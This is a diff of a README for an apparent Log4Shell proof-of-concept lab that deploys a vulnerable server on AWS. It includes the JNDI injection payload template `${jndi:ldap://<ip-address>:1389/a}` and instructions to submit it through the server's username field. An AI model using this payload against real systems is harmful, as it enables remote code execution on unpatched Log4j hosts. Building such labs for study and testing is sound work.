moshuum/tf-log4j-aws-poc/readme.md

 `chmod +x exploit-script-remote.sh`

 Run script with 2 supplied variable
-`./exploit-script-remote.sh <1: desktop | cloud> <2: remote ip>`
+`./exploit-script-remote.sh <1: desktop | cloud>`
+where desktop means your workdir is at Desktop and cloud means your workdir at ~/

-Note the payload is displayed end of script
+Note the payload is displayed end of script similar to `${jndi:ldap://<ip-address>:1389/a}`

 ## Vulnerable Server:
 Visit `http:<aws host url>:8080`

-Copy the payload into the username field then submit forms
+Copy the payload into the 'username' field then submit forms

 ![exploit](https://github.com/moshuum/tf-log4j-aws-poc/blob/main/images/Screenshot%202022-06-07%20034332.png?raw=true)

+## Remark
+JDK file: have ensure the integrity from baidu source is same hash from Oracle
+SHA256          187EDA2235F812DDB35C352B5F9AA6C5B184D611C2C9D0393AFB8031D8198974

 ## References
 Instance